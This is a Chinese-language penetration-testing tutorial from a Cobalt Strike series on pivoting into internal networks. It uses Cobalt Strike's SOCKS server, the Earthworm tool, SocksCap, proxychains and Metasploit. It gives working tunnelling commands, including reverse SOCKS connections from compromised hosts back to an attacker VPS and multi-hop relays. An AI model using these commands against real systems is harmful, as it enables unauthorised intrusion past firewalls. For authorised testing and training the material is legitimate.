Cobaltstrike系列教程(九)內置Socks與神器EW

0x000-前文

有技術交流或滲透測試培訓需求的朋友歡迎聯繫QQ547006660
2000人網絡安全交流羣,歡迎大佬們來玩
羣號820783253

0x001-Socks概念

目前利用網絡防火牆將組織內部的網絡結構與外部網絡如 INTERNET 中有效地隔離開來,這種方法正變得逐漸流行起來。這些防火牆系統通常以應用層網關的形式工作在網絡之間,提供受控的 TELNET 、 FTP 、 SMTP 等的接入。 SOCKS 提供一個通用框架來使這些協議安全透明地穿過防火牆。
說的簡單明瞭一點,在滲透測試中,我們使用socks技術,可以穿透進入目標機的內網,從而擴大我們的戰果
在這裏插入圖片描述

0x002-Cobaltstrike自帶Socks功能
選擇一個beacon,右鍵,中轉–>SOCKS Server,或使用命令socks [port]
在這裏插入圖片描述
彈出一個窗口,按要求配置好代理端口
在這裏插入圖片描述
如圖,成功開啓socks 4,連接我們teamserver的5126端口,即可進入目標機內網~
在這裏插入圖片描述

0x003-使用ew+SocksCap穿透到目標機內網
①Earthworm(下載見文末)
Ew(Earthworm)是一款當之無愧的內網穿透大殺器,應用的平臺非常廣泛,包括

ew_for_Win.exe        適用各種Windows系統(X86指令集、X64指令集)        Windows7、Windows XP
ew_for_Linux32        各常見Linux發行版 (X86 指令集 CPU)        Ubuntu(X86)/BT5(X86)
ew_for_linux64        各常見Linux發行版 (X64 指令集 CPU)        Ubuntu(X64)/Kali(X64)
ew_for_MacOSX64        MacOS系統發行版 (X64 指令集)        蘋果PC電腦,蘋果server
ew_for_Arm32        常見Arm-Linux系統        HTC New One(Arm-Android)/小米路由器(R1D)
ew_mipsel        常見Mips-Linux系統 (Mipsel指令集 CPU)        螢石硬盤錄像機、小米mini路由器(R1CM)

下面簡單講一下它的應用場景和命令
在這裏插入圖片描述

正向socks v5服務器 【適用於目標機擁有一個外網IP】

服務器端執行以下命令
ew.exe -s ssocksd -l 888

說明:服務器開啓端口爲888,SOCKS的代理。然後使用sockscap64添加這個IP的代理就可以使用了。

反彈socks v5服務器 【適用於目標機器沒有公網IP,但可訪問內網資源】

本地執行以下命令
ew.exe -s rcsocks -l 1008 -e 888

說明:該命令的意思是在我們公網VPS上添加一個轉接隧道,把1080端口收到的代理請求轉交給888端口。

服務器端執行以下命令
ew.exe -s rssocks -d 2.2.2.2 -e 888

說明:該命令的意思是在服務器上啓動SOCKS V5服務,並反彈到IP地址爲2.2.2.2的服務器888端口上。

二級網絡環境(一)

假設我們獲得了右側A主機和B主機的控制權
A主機配有2塊網卡,一塊連通外網,一塊10.48.128.25只能連接內網B主機,無法訪問內網其它資源。
B主機可以訪問內網資源,但無法訪問外網。

A.先上傳ew到B主機,利用ssocksd方式啓動888端口的SOCKS代理,命令如下:
ew -s ssocksd -l 888

B.上傳ew到右側A主機,運行下列命令:
ew -s lcx_tran -l 1080 -f 10.48.128.49 -g 888

說明:該命令意思是將1080端口收到的代理請求轉交給B主機(10.48.128.49)的888端口。

C.可以通過訪問A主機外網139.XXX.XX.113:1080來使用在B主機架設的socks5代理。

二級網絡環境(二)

假設我們獲得了右側A主機和B主機的控制權限。
A主機沒有公網IP,也無法訪問內網資源。B主機可以訪問內網資源,但無法訪問外網。

這個操作分爲4步,用到lcx_listen和lcx_slave命令:

A. 先上傳ew 到左側公網VPS上,運行下列命令:
ew –s lcx_listen –l 10800 –e 888
說明:該命令意思是在公網VPS添加轉接隧道,將10800端口收到的代理請求轉交給888端口。

B.上傳ew到B主機,並利用ssocksd方式啓動999端口的socks代理,命令如下:
ew -s ssocksd -l 999

C.上傳ew 到A主機,運行下列命令:
ew -s lcx_slave -d 139.XXX.XX.113 -e 888 -f 10.48.128.49 -g 999
說明:該命令意思是在A主機上利用lcx_slave方式,將公網VPS的888端口和B主機的999端口連接起來。

D. 返回我們公網VPS的CMD界面下,可以看到已經連接成功了。
現在就可以通過訪問公網VPS地址 139.XXX.XX.113:10800來使用在B主機架設的socks5代理。

三級網絡環境

三級網絡環境在實際滲透中用的比較少,也比較複雜,現在我們來一個個的講解下三級級聯的用法。

假設滲透場景:
內網A主機沒有公網IP但可以訪問外網
B主機不能訪問外網但可以被A主機訪問、C主機可被B主機訪問而且能夠訪問核心區域。

A.在左側公網VPS上運行命令,將1080端口收到的代理請求轉交給888端口:
ew -s rcsocks -l 1080 -e 888

B.在A主機上運行命令,將公網VPS的888端口和B主機的999端口連接起來:
ew -s lcx_slave -d 139.XXX.XX.113 -e 888 -f 10.48.128.12 -g 999

C.在B主機上運行命令,將999端口收到的代理請求轉交給777端口:
ew -s lcx_listen -l 999 -e 777

D.在C主機上啓動SOCKS V5服務,並反彈到B主機的777端口上,命令如下。
ew -s rssocks -d 10.48.128.12 -e 777

E.在MY PC上可以通過訪問公網VPS 139.XXX.XX.113:1080來使用在C主機架設的socks5代理。

整個數據流向是:SOCKS V5 → 1080 → 888 →999 →777 → rssocks

實戰場景

本次測試目標機器沒有公網IP,但可訪問內網資源
1.我們在teamserver上運行以下命令
ew.exe -s rcsocks -l 1008 -e 888
接受888端口數據,然後轉發到1008端口
在這裏插入圖片描述
2.然後我們在目標機上傳ew,然後在cs中執行
ew.exe -s rssocks -d 2.2.2.2 -e 888(2.2.2.2爲teamserver)
在這裏插入圖片描述

3.隨後,我們的teamserver就會顯示連接成功
在這裏插入圖片描述

②使用SocksCap連接socks
根據自己的Windows版本以管理員模式運行SocksCap後
點擊代理,然後添加自己teamserver的ip和剛剛轉發出來的端口
在這裏插入圖片描述
在這裏把代理切換成剛剛添加的
在這裏插入圖片描述
右鍵,添加一個exe文件,根據你的需求,添加要在socks隧道中運行的程序
在這裏插入圖片描述
選擇程序,右鍵–>在代理隧道中運行選中程序,該程序即可通過socks進入目標內網
在這裏插入圖片描述
如圖,爲連入socks通道的cmd ping目標機的某內網ip
在這裏插入圖片描述

0x004-在Kali中Metasploit使用socks通道
1.使用cs搭建好socks4通道後,首先配置神器proxychains
在/etc/proxychains.conf配置文件中添加新的代理服務器。通過激活動態鏈設置,確保在不同的代理服務器之間能夠正常切換。

root@kali:~# cat /etc/proxychains.conf | grep -v "#"
dynamic_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
socks4  172.16.0.20 1080  # socks4通道的IP及端口

然後在MSF中,配置socks4隧道即可讓MSF進入目標機內網大殺四方
(2.2.2.2爲teamserver的ip,1081爲socks端口)

msf exploit(ms08_067_netapi) > use auxiliary/server/socks4a
msf auxiliary(socks4a) > set SRVHOST 2.2.2.2
msf auxiliary(socks4a) > set SRVPORT 1081
SRVPORT => 1081
msf auxiliary(socks4a) > run
[*] Auxiliary module execution completed
[*] Starting the socks4a proxy server
msf auxiliary(socks4a) >

在這裏插入圖片描述

0x005-下載
Socks這塊知識可能比較繞,大家如果沒整懂,可以聯繫我交流。
EW和SocksCap下載鏈接
在這裏插入圖片描述
鏈接:https://pan.baidu.com/s/13t45euOJfLF4xedVfL0s1A
提取碼:26az

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章